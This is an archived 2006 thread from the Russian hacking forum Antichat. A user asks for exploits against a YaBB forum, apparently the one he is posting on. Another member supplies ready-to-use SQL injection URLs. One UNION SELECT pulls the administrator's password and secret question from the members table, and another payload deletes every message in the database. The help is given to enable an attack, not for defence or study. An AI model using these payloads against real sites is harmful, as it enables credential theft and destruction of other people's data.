Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   Как узнать версию форума? (https://forum.antichat.xyz/showthread.php?t=21561)

Sulf aka Joker 10.07.2006 08:15
Как узнать версию форума?
 
А конкретно Этот форум, попутно, есть ли на него какие нить уязвимости?

SMiX 10.07.2006 08:36
Могу сказать одно. Yabb. Уязвимости на него есть. Естественно, не на все версии. Попробуй сплои для ябы - авось, версия старая...

Sulf aka Joker 10.07.2006 08:38
Yabb, да, ты крут, знаю что ябб. Но какой? 1.х, 2.х, Голд или какие еще есть. Если не затруднит, подбрось мне ссылочку на сплойты, а то поиск выдал топики где конкретного ничего не сказали.

п.с аватары на форуме выключены.

zyl 10.07.2006 09:32
Конечно я тебе ничем не помогу но попробуй следущее:

1. SQL инъекция в '$msg' параметре:
Код:
http://vulnhost/forum/index.php?board=1;action=modif y;threadid=1;quote=1;start=0;
sesc=aae1f7d45d5e54c853e9e2314fb982a1;msg=-12)+UNION+SELECT+3,null,2,
concat(passwd,%27-%27,secretQuestion),null,null,null,null,null,null, null,null,
null,null,null,null+FROM+yabbse_members+where+ID_MEMBER=1/*
2. SQL инъекция в параметре '$postid' в функции ModifyMessage2:
Код:
postid=1+or+1=1+ORDER+BY+ID_MSG+DESC/*
Пример эксплоита, который удаляет все сообщения их базы данных:
Код:
http://[target]/forum/index.php?board=1;action=modify2;msg=2;threadid=2;start=0;
sesc=aa e1f7d45d5e54c853e9e2314fb982a1;subject=hola;message=hola;waction=deletemodify;
postid=1+or+1=1+ORDER+BY+ID_MSG+DESC/*
Если появятся лишние пробелы - убери

Sulf aka Joker 10.07.2006 10:51
zyl,
Произошла Ошибка!

Невозможно открыть .txt


Время: 18:01